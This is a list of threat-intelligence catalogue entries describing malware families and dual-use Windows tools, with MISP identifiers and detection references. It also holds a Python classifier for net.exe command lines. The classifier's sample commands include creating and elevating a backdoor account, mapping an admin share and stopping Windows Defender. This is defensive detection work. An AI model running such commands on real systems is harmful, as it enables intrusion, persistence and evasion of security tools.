platforms ['Windows']
software_attack_id S0272
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Nebulae

Nebulae is a backdoor that has been used by Naikon since at least 2020.[Bitdefender Naikon April 2021]

Internal MISP references

UUID 38510bab-aece-4d7b-b621-7594c2c4fe14 which can be used as unique global reference for Nebulae in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0630
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Neoichor

Neoichor is C2 malware used by Ke3chang since at least 2019; similar malware families used by the group include Leeson and Numbldea.[Microsoft NICKEL December 2021]

Internal MISP references

UUID 8662e29e-5766-4311-894e-5ca52515ccbe which can be used as unique global reference for Neoichor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0691
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Nerex

Nerex is a Trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Nerex May 2012]

Internal MISP references

UUID de8b18c9-ebab-4126-96a9-282fa8829877 which can be used as unique global reference for Nerex in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0210
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Net

The Net utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. [Microsoft Net Utility]

Net has a great deal of functionality, [Savill 1999] much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through SMB/Windows Admin Shares using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.
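The paragraph above lists the net.exe uses an analyst cares about: discovery, lateral movement over admin shares with net use, service interaction, and the net1.exe alias. The following classifier, added here as an example (it is not part of the Tidal or MITRE entry), labels net/net1 command lines by that intent. The category names and the sample command lines are this example's own; the verbs and switches it recognises (use, user, group, localgroup, share, start, stop, /add, /delete, /domain) are from the Microsoft net documentation the entry cites.

```python
"""Classify net.exe / net1.exe command lines by intent (added example)."""
import shlex
from dataclasses import dataclass
from typing import List, Optional

ACCOUNT_VERBS = {"user", "group", "localgroup"}
SERVICE_VERBS = {"start", "stop", "pause", "continue"}
DISCOVERY_VERBS = ACCOUNT_VERBS | {"use", "view", "share", "session", "accounts",
                                   "config", "time", "statistics", "start"}


@dataclass
class NetCommand:
    binary: str            # "net" or "net1" (net1 is the worker net.exe delegates to)
    verb: str
    target: Optional[str]  # first positional argument after the verb
    scope: str             # "domain" when /domain is present, else "local"
    category: str          # label assigned below (this example's own vocabulary)


def _tokens(cmd: str) -> List[str]:
    # Non-POSIX mode keeps backslashes (UNC paths) intact; surrounding quotes are stripped here.
    return [t.strip('"') for t in shlex.split(cmd, posix=False)]


def classify(cmd: str) -> Optional[NetCommand]:
    """Return None for anything that is not net.exe or net1.exe."""
    toks = _tokens(cmd)
    if not toks:
        return None
    binary = toks[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if binary.endswith(".exe"):
        binary = binary[:-4]
    if binary not in ("net", "net1"):
        return None
    verb = toks[1].lower() if len(toks) > 1 else ""
    args = toks[2:]
    switches = {a.lower().split(":", 1)[0] for a in args if a.startswith("/")}
    positional = [a for a in args if not a.startswith("/")]
    target = positional[0] if positional else None
    scope = "domain" if "/domain" in switches else "local"

    if verb == "use" and target and target.startswith("\\\\"):
        # Mapping a remote share; C$, ADMIN$ and IPC$ are the admin shares used for lateral movement.
        share = target.rstrip("\\").rsplit("\\", 1)[-1]
        category = "lateral_movement_admin_share" if share.endswith("$") else "lateral_movement_share"
    elif verb in ACCOUNT_VERBS and switches & {"/add", "/delete"}:
        category = "account_manipulation"
    elif verb == "user" and len(positional) >= 2 and not switches - {"/domain"}:
        category = "account_manipulation"        # `net user NAME PASSWORD` resets a password
    elif verb == "share" and any("=" in a for a in positional):
        category = "share_modification"
    elif verb in SERVICE_VERBS and target:
        category = "service_control"
    elif verb in DISCOVERY_VERBS:
        category = "discovery"                   # bare `net use`/`net start`/`net user` enumerate
    else:
        category = "other"
    return NetCommand(binary, verb, target, scope, category)


def triage(cmds: List[str]) -> List[str]:
    """Categories for a batch of command lines; non-net commands are skipped."""
    return [c.category for c in map(classify, cmds) if c is not None]


# Constructed sample command lines (not taken from any real incident).
SAMPLE_COMMANDS = [
    r"net user",
    'net group "Domain Admins" /domain',
    r"net use \\FS01\C$ /user:CORP\alice",
    r"net1 user backup_svc P@ss123 /add /domain",
    r"net localgroup administrators backup_svc /add",
    r"net stop WinDefend",
    r"C:\Windows\System32\net1.exe share",
    r"ipconfig /all",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(f"{cmd!r:50} -> {classify(cmd)}")
```

Two details matter in practice: the net1 alias is normalised before anything else, since detections that match only on "net.exe" miss it entirely, and the admin-share check looks at the last UNC component rather than the whole path, so \\FS01\C$ and \\FS01\ADMIN$ are treated alike while an ordinary user share is not.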

Internal MISP references

UUID c9b8522f-126d-40ff-b44e-1f46098bd8cc which can be used as unique global reference for Net in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0039
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '4e7ae33d-e040-4618-bccf-3b5e4aac81ed', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Net Crawler

Net Crawler is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using PsExec to execute a copy of Net Crawler. [Cylance Cleaver]

Internal MISP references

UUID 947c6212-4da8-48dd-9da9-ce4b077dd759 which can be used as unique global reference for Net Crawler in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0056
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

NETEAGLE

NETEAGLE is a backdoor developed by APT30 with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” [FireEye APT30]

Internal MISP references

UUID 852c300d-9313-442d-9b49-9883522c3f4b which can be used as unique global reference for NETEAGLE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0034
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

netsh

netsh is a scripting utility used to interact with networking components on local or remote systems. [TechNet Netsh]

Internal MISP references

UUID 803192b8-747b-4108-ae15-2d7481d39162 which can be used as unique global reference for netsh in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0108
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '064dc489-6b50-4cc1-bb9b-fe722f21aaf1', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

netstat

netstat is an operating system utility that displays active TCP connections, listening ports, and network statistics. [TechNet Netstat]

Internal MISP references

UUID 132fb908-9f13-4bcf-aa64-74cbc72f5491 which can be used as unique global reference for netstat in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0104
source MITRE
tags ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

NetTraveler

NetTraveler is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. [Kaspersky NetTraveler]

Internal MISP references

UUID 1b8f9cf9-db8f-437d-800e-5ddd090fe30d which can be used as unique global reference for NetTraveler in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0033
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Netwalker

Netwalker is fileless ransomware written in PowerShell and executed directly in memory.[TrendMicro Netwalker May 2020]

Internal MISP references

UUID 5b4b395f-f61a-4bd6-94c1-fb45ed3cd13d which can be used as unique global reference for Netwalker in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0457
source MITRE
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '242bc007-5ac5-4d96-8638-699a06d06d24', 'e554bd60-5de3-4162-9ed3-66073ae9d6b3', '0e948c57-6c10-4576-ad27-9832cc2af3a1', '3d90eed2-862d-4f61-8c8f-0b8da3e45af0', '2743d495-7728-4a75-9e5f-b64854039792', '4fb4824e-1995-4c65-8c71-e818c0aa1086', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

NETWIRE

NETWIRE is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.[FireEye APT33 Sept 2017][McAfee Netwire Mar 2015][FireEye APT33 Webinar Sept 2017]

Internal MISP references

UUID c7d0e881-80a1-49ea-9c1f-b6e53cf399a8 which can be used as unique global reference for NETWIRE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0198
source MITRE
tags ['6c6c0125-9631-4c2c-90ab-cfef374d5198']
type ['malware']
Related clusters

To see the related clusters, click here.

Network Scanner

Network Scanner (NS.exe) is a utility that can be used to enumerate file shares within a given environment.[The DFIR Report Dharma Ransomware June 2020]

Internal MISP references

UUID 56018455-7644-4e59-845a-986f55efcad4 which can be used as unique global reference for Network Scanner in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5278
source Tidal Cyber
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', 'e1af18e3-3224-4e4c-9d0f-533768474508']
type ['tool']
Related clusters

To see the related clusters, click here.

ngrok

ngrok is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. ngrok has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.[Zdnet Ngrok September 2018][FireEye Maze May 2020][Cyware Ngrok May 2019][MalwareBytes LazyScripter Feb 2021]

Internal MISP references

UUID 316ecd9d-ac0b-58c7-8083-5d9214c770f6 which can be used as unique global reference for ngrok in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0508
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', 'd75c1a80-0cb8-4a64-8379-10514cd44b1e', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59']
type ['tool']
Related clusters

To see the related clusters, click here.

Nidiran

Nidiran is a custom backdoor developed and used by Suckfly. It has been delivered via strategic web compromise. [Symantec Suckfly March 2016]

Internal MISP references

UUID 3ae9acd7-39f8-45c6-b557-c7d9a40eed2c which can be used as unique global reference for Nidiran in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0118
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

NightClub

NightClub is a modular implant written in C++ that has been used by MoustachedBouncer since at least 2014.[MoustachedBouncer ESET August 2023]

Internal MISP references

UUID b1963876-dbdc-5beb-ace3-acb6d7705543 which can be used as unique global reference for NightClub in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1090
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

NirSoft

NirSoft is a self-described "freeware" utility that can be used to recover passwords.[NirSoft Website] According to U.S. cybersecurity authorities, ransomware actors such as those associated with the Royal ransomware operation have used the NirSoft utility to harvest passwords for malicious purposes.[#StopRansomware: Royal Ransomware | CISA]

Internal MISP references

UUID efa5fff4-f6db-4719-91c7-97dbe93099a8 which can be used as unique global reference for NirSoft in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5271
source Tidal Cyber
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

njRAT

njRAT is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.[Fidelis njRAT June 2013]

Internal MISP references

UUID 82996f6f-0575-45cd-8f7c-ba1b063d5b9f which can be used as unique global reference for njRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0385
source MITRE
tags ['16b47583-1c54-431f-9f09-759df7b5ddb7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Nltest

Nltest is a Windows command-line utility used to list domain controllers and enumerate domain trusts.[Nltest Manual]

Internal MISP references

UUID fbb1546a-f288-4e43-9e5c-14c94423c4f6 which can be used as unique global reference for Nltest in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0359
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '24f6ba0e-9230-4410-a9fb-b0f3b55de326', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Nmap

According to its project website, "Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing".[Nmap: the Network Mapper]

Internal MISP references

UUID 042e61cf-a8e1-42ec-8974-a3b2e2037c08 which can be used as unique global reference for Nmap in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5051
source Tidal Cyber
tags ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '6ff40d11-214a-434b-b137-993e4ff5e34e', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865']
type ['tool']
Related clusters

To see the related clusters, click here.

NOKKI

NOKKI is a modular remote access tool. The earliest observed attack using NOKKI was in January 2018. NOKKI has significant code overlap with the KONNI malware family. There is some evidence potentially linking NOKKI to APT37.[Unit 42 NOKKI Sept 2018][Unit 42 Nokki Oct 2018]

Internal MISP references

UUID 31aa0433-fb6b-4290-8af5-a0d0c6c18548 which can be used as unique global reference for NOKKI in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0353
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

NotPetya

NotPetya is malware that was used by Sandworm Team in a worldwide attack starting on June 27, 2017. While NotPetya appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, NotPetya may be more appropriately thought of as a form of wiper malware. NotPetya contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.[Talos Nyetya June 2017][US-CERT NotPetya 2017][ESET Telebots June 2017][US District Court Indictment GRU Unit 74455 October 2020]

Internal MISP references

UUID 2538e0fe-1290-4ae1-aef9-e55d83c9eb23 which can be used as unique global reference for NotPetya in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0368
source MITRE
tags ['09de661e-60c4-43fb-bfef-df017215d1d8', '5a463cb3-451d-47f7-93e4-1886150697ce', 'c2380542-36f2-4922-9ed2-80ced06645c9', '7e7b0c67-bb85-4996-a289-da0e792d7172', 'e809d252-12cc-494d-94f5-954c49eb87ce']
type ['malware']
Related clusters

To see the related clusters, click here.

Npcap

According to its project website, "Npcap is the Nmap Project's packet capture (and sending) library for Microsoft Windows".[Npcap: Windows Packet Capture Library & Driver] Nmap is a utility used for network discovery and security auditing.

Internal MISP references

UUID d1817595-9186-4749-aeab-26c774c1885d which can be used as unique global reference for Npcap in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5052
source Tidal Cyber
tags ['15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865']
type ['tool']

Ntdsutil

Ntdsutil is a Windows command-line tool "that provides management facilities for Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS)."[Ntdsutil Microsoft]

Internal MISP references

UUID 9af571bb-f3c7-434b-8187-3e4ceb0ec6fc which can be used as unique global reference for Ntdsutil in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5018
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '1da5eb1e-7ac5-4284-99cb-ce227cad8983', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

ObliqueRAT

ObliqueRAT is a remote access trojan, similar to Crimson, that has been in use by Transparent Tribe since at least 2020.[Talos Oblique RAT March 2021][Talos Transparent Tribe May 2021]

Internal MISP references

UUID 97e8148c-e146-444c-9de5-6e2fdbda2f9f which can be used as unique global reference for ObliqueRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0644
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

OceanSalt

OceanSalt is a Trojan that was used in a campaign targeting victims in South Korea, the United States, and Canada. OceanSalt shares code similarity with SpyNote RAT, which has been linked to APT1.[McAfee Oceansalt Oct 2018]

Internal MISP references

UUID f1723994-058b-4525-8e11-2f0c80d8f3a4 which can be used as unique global reference for OceanSalt in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0346
source MITRE
type ['malware']

Octopus

Octopus is a Windows Trojan written in the Delphi programming language that has been used by Nomadic Octopus to target government organizations in Central Asia since at least 2014.[Securelist Octopus Oct 2018][Security Affairs DustSquad Oct 2018][ESET Nomadic Octopus 2018]

Internal MISP references

UUID 8f04e609-8773-4529-b247-d32f530cc453 which can be used as unique global reference for Octopus in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0340
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Odbcconf

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used in Windows for managing ODBC connections

Author: Oddvar Moe

Paths:
* C:\Windows\System32\odbcconf.exe
* C:\Windows\SysWOW64\odbcconf.exe

Resources:
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
* https://github.com/woanware/application-restriction-bypasses
* https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/

Detection:
* Sigma: proc_creation_win_odbcconf_response_file.yml
* Sigma: proc_creation_win_odbcconf_response_file_susp.yml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml [LOLBAS Odbcconf]

Internal MISP references

UUID 5e434819-7f4a-440c-a9bd-7675c0218be1 which can be used as unique global reference for Odbcconf in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5134
source Tidal Cyber
tags ['64825d12-3cd6-4446-a93c-ff7d8ec13dc8', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

OfflineScannerShell

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows Defender Offline Shell

Author: Elliot Killick

Paths:
* C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe

Resources: None Provided

Detection:
* Sigma: proc_creation_win_lolbas_offlinescannershell.yml
* IOC: OfflineScannerShell.exe should not be run on a normal workstation [OfflineScannerShell.exe - LOLBAS Project]

Internal MISP references

UUID 8bc7c62a-110d-451b-9ca6-bc48a13e72d4 which can be used as unique global reference for OfflineScannerShell in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5135
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Okrum

Okrum is a Windows backdoor that has been seen in use since December 2016 with strong links to Ke3chang.[ESET Okrum July 2019]

Internal MISP references

UUID f9bcf0a1-f287-44ec-8f53-6859d41e041c which can be used as unique global reference for Okrum in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0439
source MITRE
tags ['8bf128ad-288b-41bc-904f-093f4fdde745']
type ['malware']
Related clusters

To see the related clusters, click here.

OLDBAIT

OLDBAIT is a credential harvester used by APT28. [FireEye APT28] [FireEye APT28 January 2017]

Internal MISP references

UUID 479814e2-2656-4ea2-9e79-fcdb818f703e which can be used as unique global reference for OLDBAIT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0138
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']
Related clusters

To see the related clusters, click here.

Olympic Destroyer

Olympic Destroyer is malware that was used by Sandworm Team against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. Olympic Destroyer has worm-like features to spread itself across a computer network in order to maximize its destructive impact.[Talos Olympic Destroyer 2018][US District Court Indictment GRU Unit 74455 October 2020]

Internal MISP references

UUID 073b5288-11d6-4db0-9f2c-a1816847d15c which can be used as unique global reference for Olympic Destroyer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0365
source MITRE
tags ['e809d252-12cc-494d-94f5-954c49eb87ce']
type ['malware']
Related clusters

To see the related clusters, click here.

OneDriveStandaloneUpdater

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: OneDrive Standalone Updater

Author: Elliot Killick

Paths:
* %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe

Resources:
* https://github.com/LOLBAS-Project/LOLBAS/pull/153

Detection:
* IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL
* IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files
* Sigma: registry_set_lolbin_onedrivestandaloneupdater.yml [OneDriveStandaloneUpdater.exe - LOLBAS Project]

Internal MISP references

UUID 49ef42bc-0958-4b61-9593-a4af69432410 which can be used as unique global reference for OneDriveStandaloneUpdater in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5136
source Tidal Cyber
tags ['b6116080-8fbf-4e9f-9206-20b025f2cf23', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

OnionDuke

OnionDuke is malware that was used by APT29 from 2013 to 2015. [F-Secure The Dukes]

Internal MISP references

UUID 6056bf36-fb45-498d-a285-5f98ae08b090 which can be used as unique global reference for OnionDuke in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0052
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

OopsIE

OopsIE is a Trojan used by OilRig to remotely execute commands as well as upload/download files to/from victims. [Unit 42 OopsIE! Feb 2018]

Internal MISP references

UUID 4f1894d4-d085-4348-af50-dfda257a9e18 which can be used as unique global reference for OopsIE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0264
source MITRE
tags ['8bf128ad-288b-41bc-904f-093f4fdde745']
type ['malware']
Related clusters

To see the related clusters, click here.

OpenConsole

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Console Window host for Windows Terminal

Author: Nasreddine Bencherchali

Paths:
* C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
* C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe
* C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe

Resources:
* https://twitter.com/nas_bench/status/1537563834478645252

Detection:
* IOC: OpenConsole.exe spawning unexpected processes
* Sigma: proc_creation_win_lolbin_openconsole.yml [OpenConsole.exe - LOLBAS Project]

Internal MISP references

UUID 54030309-671d-4e4b-b9c0-619cd07f5e05 which can be used as unique global reference for OpenConsole in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5230
source Tidal Cyber
tags ['1dd2d703-fed1-41d2-9843-7b276ef3d6f2', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

OpenSSH

OpenSSH is a publicly available tool for traffic encryption and remote login using the Secure Shell ("SSH") protocol. According to its project website, it also "provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options".[OpenSSH Project Page]

Internal MISP references

UUID 5edec691-d2f1-4928-a12d-1ff59ba959a6 which can be used as unique global reference for OpenSSH in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5273
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96']
type ['tool']
Related clusters

To see the related clusters, click here.

Orz

Orz is a custom JavaScript backdoor used by Leviathan. It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. [Proofpoint Leviathan Oct 2017] [FireEye Periscope March 2018]

Internal MISP references

UUID 45a52a29-00c0-458a-b705-1040e06a43f2 which can be used as unique global reference for Orz in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0229
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

OSInfo

OSInfo is a custom tool used by APT3 to do internal discovery on a victim's computer and network. [Symantec Buckeye]

Internal MISP references

UUID fa1e13b8-2fb7-42e8-b630-25f0edfbca65 which can be used as unique global reference for OSInfo in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0165
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

OSX_OCEANLOTUS.D

OSX_OCEANLOTUS.D is a macOS backdoor used by APT32. First discovered in 2015, it has since been improved by APT32 through a plugin architecture that extends its capabilities, specifically using .dylib files. OSX_OCEANLOTUS.D can also determine its permission level and execute according to access type (root or user).[Unit42 OceanLotus 2017][TrendMicro MacOS April 2018][Trend Micro MacOS Backdoor November 2020]

Internal MISP references

